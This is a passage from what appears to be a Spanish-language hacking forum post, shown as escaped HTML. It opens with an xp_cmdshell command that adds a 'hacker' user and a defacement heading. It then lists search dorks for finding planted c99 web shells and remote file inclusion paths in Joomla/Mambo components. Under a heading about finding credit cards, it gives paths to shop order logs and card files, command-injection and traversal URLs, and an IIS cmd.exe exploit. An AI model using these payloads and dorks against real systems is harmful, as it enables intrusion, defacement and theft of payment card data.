/&gt;xp_cmdshell 'net user hacker /add'&lt;br /&gt;Deface&lt;br /&gt;Manual Defacing&lt;br /&gt;Defacers&lt;br /&gt;##############################&lt;br /&gt;Dorks:&lt;br /&gt;&lt;div id="post_message_31490" class="overflow_parent"&gt;&lt;div class="overflow_child"&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 1010px; text-align: left;"&gt;safe-mode: off (not secure) drwxrwxrwx c99shell&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php uid=0(root)&lt;br /&gt;root c99.php&lt;br /&gt;"Captain Crunch Security Team" inurl:c99&lt;br /&gt;download c99.php&lt;br /&gt;download c99.php&lt;br /&gt;download c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;allinurl: c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;allinurl: c99.php&lt;br /&gt;inurl:"/c99.php"&lt;br /&gt;allinurl: c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:"c99.php" c99shell&lt;br /&gt; inurl:c99.php uid=0(root)&lt;br /&gt; c99shell powered by admin&lt;br /&gt; c99shell powered by admin&lt;br /&gt;inurl:"/c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;c99 shell v.1.0 (roots)&lt;br /&gt;inurl:c99.php&lt;br /&gt;allintitle: "c99shell"&lt;br /&gt;inurl:"c99.php&lt;br /&gt;inurl:"c99.php&lt;br /&gt;allinurl: "c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:C99Shell v. 1.0 pre-release +uname&lt;br /&gt;intitle:C99Shell v. 1.0 pre-release +uname&lt;br /&gt;allinurl: "c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:"c99.php" c99shell&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;allinurl:c99.php&lt;br /&gt;inurl:"/c99.php&lt;br /&gt;inurl:c99.php?&lt;br /&gt;inurl:/c99.php+uname&lt;br /&gt;allinurl:"c99.php"&lt;br /&gt;allinurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;allinurl:c99.php&lt;br /&gt;allinurl:c99.php?&lt;br /&gt;allinurl:c99.php?&lt;br /&gt;allinurl:c99.php?&lt;br /&gt;"inurl:c99..php"&lt;br /&gt;allinurl:c99.php&lt;br /&gt; c99shell [file on secure ok ]?&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt; powered by Captain Crunch Security Team&lt;br /&gt;allinurl:c99.php&lt;br /&gt;"c99.php" filetype:php&lt;br /&gt;allinurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;allinurl:.c99.php&lt;br /&gt;"inurl:c99.php"&lt;br /&gt;c99. PHP-code Feedback Self remove&lt;br /&gt;allinurl:c99.php&lt;br /&gt;download c99.php&lt;br /&gt;allinurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;allinurl: "c99.php"&lt;br /&gt;allinurl:c99.php&lt;br /&gt;allinurl:c99.php&lt;br /&gt;c99shell&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:C99Shell v. 1.0 pre-release +uname&lt;br /&gt;allinurl:"c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;safe-mode: off (not secure) drwxrwxrwx c99shell&lt;br /&gt;inurl:/c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;c99.php download&lt;br /&gt; inurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:/c99.php&lt;br /&gt;inurl:"c99.php?"&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;files/c99.php&lt;br /&gt;c99shell filetype:php -echo&lt;br /&gt;c99shell powered by admin&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:c99.php uid=0(root)&lt;br /&gt;allinurl:c99.php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;inurl:"/c99.php" intitle:"C99shell"&lt;br /&gt;inurl:"/c99.php" intitle:"C99shell"&lt;br /&gt;inurl:"/c99.php" intitle:"C99shell"&lt;br /&gt;C99Shell v. 1.0 pre-release build #5&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;--[ c99shell v. 1.0 pre-release build #16&lt;br /&gt;c99shell linux infong&lt;br /&gt;c99shell linux infong&lt;br /&gt;C99Shell v. 1.0 pre-release build&lt;br /&gt;!C99Shell v. 1.0 beta!&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;!c99shell v. 1+Safe-mode: OFF (not secure)&lt;br /&gt;"C99Shell v. 1.0 pre-release build "&lt;br /&gt;intitle:c99shell +filetype:php&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:C99Shell v. 1.0 pre-release +uname&lt;br /&gt;"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;intitle:!C99Shell v. 1.0 pre-release build #16! root&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;C99Shell v. 1.0 pre-release build #16!&lt;br /&gt;c99shell v. 1.0 pre-release build #16&lt;br /&gt;intitle:c99shell intext:uname&lt;br /&gt;allintext:C99Shell v. 1.0 pre-release build #12&lt;br /&gt;c99shell v. 1.0 pre-release build #16&lt;br /&gt;--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--&lt;br /&gt;allinurl: "c99.php"&lt;br /&gt;allinurl: "c99.php"&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;"c99shell v 1.0"&lt;br /&gt;ftp apache inurl:c99.php&lt;br /&gt;c99shell+v.+1.0 16&lt;br /&gt;C99Shell v. 1.0 pre-release build #16 download&lt;br /&gt;intitle:c99shell "Software: Apache"&lt;br /&gt;allinurl: c99.php&lt;br /&gt;allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove&lt;br /&gt;&lt;br /&gt;Logout&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;c99shell v. 1.0 release security&lt;br /&gt;c99shell v. 1.0 pre-release build&lt;br /&gt;inurl:c99.php&lt;br /&gt;c99shell [file on secure ok ]?&lt;br /&gt;C99Shell v. 1.3&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;inurl:c99.php uid=0(root)&lt;br /&gt; powered by Captain Crunch Security Team&lt;br /&gt;C99Shell v. 1.0 pre-release build #16&lt;br /&gt;c99shell[on file]ok&lt;br /&gt;c99shell[file on ]ok&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;inurl:c99.php&lt;br /&gt;"C99Shell v. 1.0 pre"&lt;br /&gt;=C99Shell v. 1.0 pre-release&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;c99shell v. pre-release build&lt;br /&gt;inurl:c99.php c99 shell&lt;br /&gt;inurl:c99.php c99 shell&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;intitle:"c99shell" filetype:php root&lt;br /&gt;intitle:"c99shell" Linux infong 2.4&lt;br /&gt;C99Shell v. 1.0 beta !&lt;br /&gt;C99Shell v. 1.0 pre-release build #&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;allintext:C99Shell v. 1.0 pre-release build #12&lt;br /&gt;"C99Shell v. 1.0 pre"&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;inurl:/c99.php?&lt;br /&gt;allinurl:c99.php&lt;br /&gt;intitle:C99Shell pre-release&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;inurl:c99.php&lt;br /&gt;C99Shell v. 1.0 pre-release build #16!&lt;br /&gt;allinurl:c99.php&lt;br /&gt;C99Shell v. 1.0 pre-release build #16 administrator&lt;br /&gt;intitle:c99shell filetype:php&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;C99Shell v. 1.0 pre-release build #12&lt;br /&gt;c99shell v.1.0&lt;br /&gt;allinurl:c99.php&lt;br /&gt;"c99shell v. 1.0 pre-release build"&lt;br /&gt;inurl:"c99.php" filetype:php&lt;br /&gt;"c99shell v. 1.0 "&lt;br /&gt;ok c99.php&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt; c99shell v. 1.0 pre-release build #16 |&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;allinurl:/c99.php&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;inurl:c99.php&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;inurl:c99.php&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;inurl:c99.php&lt;br /&gt;C99Shell v. 1.0 pre-release&lt;br /&gt;inurl:c99.php&lt;br /&gt;inurl:c99.php ext:php&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;allinurl:"c99.php"&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;powered by Captain Crunch Security Team&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"&lt;br /&gt;C99Shell v. 1.0 pre-release build #16 software apache&lt;br /&gt; Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;"c99shell v 1.0"&lt;br /&gt;inurl:"c99.php"&lt;br /&gt;allintitle: C99shell filetype:php&lt;br /&gt;C99Shell v. 1.0 pre-release build #16!&lt;br /&gt;"c99shell v. 1.0 pre-release"&lt;br /&gt;c99shell v. 1.0 pre-release build #5&lt;br /&gt;allinurl:"c99.php" filetype:php&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;!C99Shell v. 1.0 pre-release build #16!&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:C99Shell v. 1.0 pre-release +uname&lt;br /&gt;inurl:c99.php&lt;br /&gt;c99shell v. 1.0&lt;br /&gt;allinurl: c99.php&lt;br /&gt; --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--&lt;br /&gt;inurl:"/c99.php"&lt;br /&gt;c99shell +uname&lt;br /&gt;c99shell php + uname&lt;br /&gt;c99shell php + uname&lt;br /&gt;--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--&lt;br /&gt;allinurl:c99.php&lt;br /&gt;!C99Shell v. 1.0 pre-release build #5!&lt;br /&gt;C99Shell v.1.0 pre-release&lt;br /&gt;Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:c99shell filetype:php&lt;br /&gt;"Encoder Tools Proc. FTP brute"&lt;br /&gt;"c99" filetype:php intext:"Safe-Mode: OFF"&lt;br /&gt;c99shell v. 1.0 pre&lt;br /&gt;inurl:c99.php&lt;br /&gt;intitle:c99shell uname -bbpress&lt;br /&gt;intitle:"index.of" c99.php&lt;br /&gt;inurl:admin/files/&lt;br /&gt;intitle:"index of /" "c99.php"&lt;br /&gt;intitle:"index of" intext:c99.php&lt;br /&gt;intitle:index.of c99.php&lt;br /&gt;intitle:"index of" + c99.php&lt;br /&gt;intitle:index/of file c99.php&lt;br /&gt;intitle:index/of file c99.php&lt;br /&gt;index of /admin/files/&lt;br /&gt;intitle:"Index of/"+c99.php&lt;br /&gt;c99.php "intitle:Index of "&lt;br /&gt;c99.php "intitle:Index of "&lt;br /&gt;c99.php "intitle:Index of "&lt;br /&gt;intitle:index.of c99.php&lt;br /&gt;img/c99.php&lt;br /&gt;intitle:index.of c99.php&lt;br /&gt; img.c99.php&lt;br /&gt;intitle:"Index of/"+c99.php&lt;br /&gt;"index of /" c99.php&lt;br /&gt;c99.php&lt;br /&gt;intitle:"Index of" c99.php&lt;br /&gt;"index of" c99.php&lt;br /&gt;"Index of/"+c99.php&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;Algunas Busquedas Para Rfi:&lt;br /&gt;&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=&lt;br /&gt;/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_simpleboard/image_upload.php?sbp=&lt;br /&gt;/components/com_simpleboard/file_upload.php?sbp=&lt;br /&gt;/components/com_hashcash/server.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_forum/download.php?phpbb_root_path=&lt;br /&gt;/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=&lt;br /&gt;/components/minibb/index.php?absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_securityimages/configinsert.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_securityimages/lang.php?mosConfig_absolute_path=&lt;br /&gt;########################&lt;br /&gt;Y para Buscar CC's:&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 1010px; text-align: left;"&gt;/~gcw/cgi-bin/Count.cgi?df=callcard.dat&lt;br /&gt;/cgi-bin/PDG_Cart/shopper.conf&lt;br /&gt;/cgi-local/PDG_Cart/shopper.conf&lt;br /&gt;/cgi-bin/PDG_Cart/order.log&lt;br /&gt;/PDG_Cart/order.log&lt;br /&gt;/cgi-bin/cart32.exe/cart32clientlist&lt;br /&gt;/cgi-bin/Count.cgi?df=callcard.dat&lt;br /&gt;/cgi/PDG_Cart/order.log&lt;br /&gt;/PDG_Cart/authorizenets.txt&lt;br /&gt;/cgi-bin/PDG_Cart/mc.txt&lt;br /&gt;/PDG/order.txt&lt;br /&gt;/cgi-bin/PDG_cart/card.txt&lt;br /&gt;/PDG_Cart/shopper.conf&lt;br /&gt;/php/mlog.phtml&lt;br /&gt;/php/mylog.phtml&lt;br /&gt;/webcart/carts&lt;br /&gt;/cgi-bin/orders.txt&lt;br /&gt;/WebShop/logs&lt;br /&gt;/cgi-bin/AnyForm2&lt;br /&gt;/cgi-bin/mc.txt&lt;br /&gt;/ccbill/secure/ccbill.log&lt;br /&gt;/cgi-bin/orders/mc.txt&lt;br /&gt;/WebCart/orders.txt&lt;br /&gt;/cgi-bin/orders/cc.txt&lt;br /&gt;/cvv2.txt&lt;br /&gt;/cgi-bin/orderlog.txt&lt;br /&gt;/WebShop/logs&lt;br /&gt;/orderb/shop.mdb&lt;br /&gt;/_private/shopping_cart.mdb&lt;br /&gt;/scripts/iisadmin/tools/mkilog.exe&lt;br /&gt;/cool-logs/mylog.html&lt;br /&gt;/cool-logs/mlog.html&lt;br /&gt;/easylog/easylog.html&lt;br /&gt;/HyperStat/stat_what.log&lt;br /&gt;/mall_log_files/&lt;br /&gt;/scripts/weblog&lt;br /&gt;/SiteScope/cgi/go.exe/SiteScope?page=eventLog&amp;amp;machine=&amp;amp;logName=System&amp;amp;account=administrator&lt;br /&gt;/super_stats/access_logs&lt;br /&gt;/trafficlog&lt;br /&gt;/wwwlog&lt;br /&gt;/Admin_files/order.log&lt;br /&gt;/bin/orders/orders.txt&lt;br /&gt;/cgi/orders/orders.txt&lt;br /&gt;/cgi-bin/orders/orders.txt&lt;br /&gt;/cgi-sys/orders/orders.txt&lt;br /&gt;/cgi-local/orders/orders.txt&lt;br /&gt;/htbin/orders/orders.txt&lt;br /&gt;/cgibin/orders/orders.txt&lt;br /&gt;/cgis/orders/orders.txt&lt;br /&gt;/scripts/orders/orders.txt&lt;br /&gt;/cgi-win/orders/orders.txt&lt;br /&gt;/bin/pagelog.cgi&lt;br /&gt;/cgi/pagelog.cgi&lt;br /&gt;/cgi-bin/pagelog.cgi&lt;br /&gt;/cgi-sys/pagelog.cgi&lt;br /&gt;/cgi-local/pagelog.cgi&lt;br /&gt;/cgibin/pagelog.cgi&lt;br /&gt;/cgis/pagelog.cgi&lt;br /&gt;/scripts/pagelog.cgi&lt;br /&gt;/cgi-win/pagelog.cgi&lt;br /&gt;/bin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-sys/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-local/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/htbin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgibin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgis/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/scripts/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-win/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/bin/DCShop/orders/orders.txt&lt;br /&gt;/cgi/DCShop/orders/orders.txt&lt;br /&gt;/cgi-bin/DCShop/orders/orders.txt&lt;br /&gt;/cgi-sys/DCShop/orders/orders.txt&lt;br /&gt;/cgi-local/DCShop/orders/orders.txt&lt;br /&gt;/htbin/DCShop/orders/orders.txt&lt;br /&gt;/cgibin/DCShop/orders/orders.txt&lt;br /&gt;/cgis/DCShop/orders/orders.txt&lt;br /&gt;/scripts/DCShop/orders/orders.txt&lt;br /&gt;/cgi-win/DCShop/orders/orders.txt&lt;br /&gt;/dc/auth_data/auth_user_file.txt&lt;br /&gt;/dcshop/orders/orders.txt&lt;br /&gt;/dcshop/auth_data/auth_user_file.txt&lt;br /&gt;/dc/orders/orders.txt&lt;br /&gt;/orders/checks.txt&lt;br /&gt;/orders/mountain.cfg&lt;br /&gt;/cgi-bin/shopper.cgi&amp;amp;TEMPLATE=ORDER.LOG&lt;br /&gt;/webcart/carts&lt;br /&gt;/webcart-lite/orders/import.txt&lt;br /&gt;/webcart/config&lt;br /&gt;/webcart/config/clients.txt&lt;br /&gt;/webcart/orders&lt;br /&gt;/webcart/orders/import.txt&lt;br /&gt;/WebShop/logs/cc.txt&lt;br /&gt;/WebShop/templates/cc.txt&lt;br /&gt;/bin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-sys/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-local/shop/auth_data/auth_user_file.txt&lt;br /&gt;/htbin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgibin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgis/shop/auth_data/auth_user_file.txt&lt;br /&gt;/scripts/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-win/shop/auth_data/auth_user_file.txt&lt;br /&gt;/bin/shop/orders/orders.txt&lt;br /&gt;/cgi/shop/orders/orders.txt&lt;br /&gt;/cgi-bin/shop/orders/orders.txt&lt;br /&gt;/cgi-sys/shop/orders/orders.txt&lt;br /&gt;/cgi-local/shop/orders/orders.txt&lt;br /&gt;/htbin/shop/orders/orders.txt&lt;br /&gt;/cgibin/shop/orders/orders.txt&lt;br /&gt;/cgis/shop/orders/orders.txt&lt;br /&gt;/scripts/shop/orders/orders.txt&lt;br /&gt;/cgi-win/shop/orders/orders.txt&lt;br /&gt;/bin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-bin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-sys/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-local/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/htbin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgibin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgis/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/scripts/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-win/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/webcart-lite/orders/import.txt&lt;br /&gt;/bin/cart.pl&lt;br /&gt;/cgi/cart.pl&lt;br /&gt;/cgi-bin/cart.pl&lt;br /&gt;/cgi-sys/cart.pl&lt;br /&gt;/cgi-local/cart.pl&lt;br /&gt;/htbin/cart.pl&lt;br /&gt;/cgibin/cart.pl&lt;br /&gt;/scripts/cart.pl&lt;br /&gt;/cgi-win/cart.pl&lt;br /&gt;/cgis/cart.pl&lt;br /&gt;/bin/cart.pl&lt;br /&gt;/cgi/cart.pl&lt;br /&gt;/cgi-bin/cart.pl&lt;br /&gt;/cgi-sys/cart.pl&lt;br /&gt;/cgi-local/cart.pl&lt;br /&gt;/htbin/cart.pl&lt;br /&gt;/cgibin/cart.pl&lt;br /&gt;/cgis/cart.pl&lt;br /&gt;/scripts/cart.pl&lt;br /&gt;/cgi-win/cart.pl&lt;br /&gt;/bin/cart32.exe&lt;br /&gt;/cgi/cart32.exe&lt;br /&gt;/cgi-bin/cart32.exe&lt;br /&gt;/cgi-sys/cart32.exe&lt;br /&gt;/cgi-local/cart32.exe&lt;br /&gt;/htbin/cart32.exe&lt;br /&gt;/cgibin/cart32.exe&lt;br /&gt;/cgis/cart32.exe&lt;br /&gt;/scripts/cart32.exe&lt;br /&gt;/cgi-win/cart32.exe&lt;br /&gt;/cgi-bin/www-sql;;;&lt;br /&gt;/server%20logfile;;;&lt;br /&gt;/cgi-bin/pdg_cart/order.log&lt;br /&gt;/cgi-bin/shopper.exe?search&lt;br /&gt;/orders/order.log&lt;br /&gt;/orders/import.txt&lt;br /&gt;/orders/checks.txt&lt;br /&gt;/orders/orders.txt&lt;br /&gt;/Orders/order.log&lt;br /&gt;/order/order.log&lt;br /&gt;/WebShop/logs/ck.log&lt;br /&gt;/WebShop/logs/cc.txt&lt;br /&gt;/WebShop/templates/cc.txt&lt;br /&gt;/_private/orders.txt&lt;br /&gt;/_private/orders.htm&lt;br /&gt;/orders/mountain.cfg&lt;br /&gt;/PDG_Cart/shopper.config&lt;br /&gt;/Admin_files/order.log&lt;br /&gt;/mall_log_files/order.log&lt;br /&gt;/PDG_Cart/order.log&lt;br /&gt;/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&amp;amp;Post=../../UBData/Members/members.grp&amp;amp;Board=6210&amp;amp;Idle=10&amp;amp;Sort=0&amp;amp;Order=Descend&amp;amp;Page=0&amp;amp;Session=;;;&lt;br /&gt;/_private/shopping_cart.mdb&lt;br /&gt;/cgi-bin/shopper.cgi&lt;br /&gt;/cgi-bin/shop.cgi&lt;br /&gt;/cgi-bin/perlshop.cgi&lt;br /&gt;/cgi-bin/mall2000.cgi&lt;br /&gt;/log/&lt;br /&gt;/logfile/&lt;br /&gt;/logfiles/&lt;br /&gt;/logger/&lt;br /&gt;/logging/&lt;br /&gt;/logs/&lt;br /&gt;/logs/access_log&lt;br /&gt;/weblog/&lt;br /&gt;/weblogs/&lt;br /&gt;/cgi-bin/loadpage.cgi&lt;br /&gt;/database/&lt;br /&gt;/databases/&lt;br /&gt;/cgi-bin/Web_Store/web_store.cgi&lt;br /&gt;/scripts/cart32.exe&lt;br /&gt;/scripts/c32web.exe&lt;br /&gt;/cgi-bin/shopper?search=action&amp;amp;keywords=dhenzuser%20&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/DCShop/Orders/orders.txt&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi&lt;br /&gt;/cgi-bin/DCShop/Orders/orders.txt&lt;br /&gt;/cgi-bin/DCShop/Auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/DCShop/Orders/orders.txt&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml&lt;br /&gt;/cgi-local/medstore/loadpage.cgi?user_id=id&amp;amp;file=data/orders.txt&lt;br /&gt;/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&amp;amp;file=data/db.txt&lt;br /&gt;/cgi-bin/cart32/whatever-OUTPUT.txt&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=root%20&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml&lt;br /&gt;/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&amp;amp;file=data/db.txt;CC&lt;br /&gt;/derbyteccgi/shopper.cgi?key=SC7021&amp;amp;preadd=action&amp;amp;template=order.log&lt;br /&gt;/derbyteccgi/shopper.cgi?search=action&amp;amp;keywords=moron&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YES&amp;amp;NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&amp;amp;CODE=PHOLD;;;&lt;br /&gt;/ccbill/secure/ccbill.log&lt;br /&gt;/cgibin/shopper.cgi?search=action&amp;amp;keywords=moron&amp;amp;template=order.csv&lt;br /&gt;/order13.txt&lt;br /&gt;/cgi-bin/loadpage.cgi?user_id=id&amp;amp;file=data/db.txtcgi-bin/PDG_Cart/order.log&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=whinhall&amp;amp;template=order.log&lt;br /&gt;/orders/db/zzzbizorders.log.html&lt;br /&gt;/cgi-bin/Shopper.exe?search=action&amp;amp;keywords=psiber%20&amp;amp;template=other&lt;br /&gt;isinglogorder.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;amp;keywords=psiber&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?preadd=action&amp;amp;key=9461&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.exe?preadd=action&amp;amp;key=bajk390ss&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shop.cgi/page=../../../../etc/hosts&lt;br /&gt;/cgi-bin/cart32/CART32-order.txt&lt;br /&gt;/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:&lt;br /&gt;/cgi-bin/mailview.cgi?cmd=view&amp;amp;fldrname=inbox&amp;amp;select=1&amp;amp;html&lt;br /&gt;/cgi-bin/cart32.ini&lt;br /&gt;/cgi-bin/cart32.exe/cart32clientlist&lt;br /&gt;/cgi-bin/cart32.exe/error&lt;br 